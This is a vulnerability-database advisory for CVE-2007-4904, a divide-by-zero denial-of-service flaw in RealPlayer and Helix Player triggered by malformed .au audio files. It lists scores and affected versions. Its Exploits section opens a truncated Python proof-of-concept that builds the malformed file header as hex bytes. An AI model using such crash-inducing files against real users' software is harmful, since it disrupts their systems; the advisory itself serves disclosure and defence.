4.3
CVSSv2

CVE-2007-4904

Published: 17/09/2007 Updated: 15/10/2018
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
VMScore: 435
Vector: AV:N/AC:M/Au:N/C:N/I:N/A:P

Vulnerability Summary

RealNetworks RealPlayer 10.1.0.3114 and previous versions, and Helix Player 1.0.6.778 on Fedora Core 6 (FC6) and possibly other platforms, allow user-assisted remote malicious users to cause a denial of service (application crash) via a malformed .au file that triggers a divide-by-zero error.

Vulnerable Product Search on Vulmon Subscribe to Product

realnetworks realplayer 10.5-gold

realnetworks realplayer 10.0.9

realnetworks realplayer 10.1

realnetworks helix player 1.0.6

realnetworks realplayer 10.0.8

Exploits

#RealPlayer 11 local/remote DoS by ASawan aka NtWaK0 and AHariri aka nophie import sys import os head = ("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"+ "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"+ "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"+ "\x00\x31\x00\x00\x00\x0 ...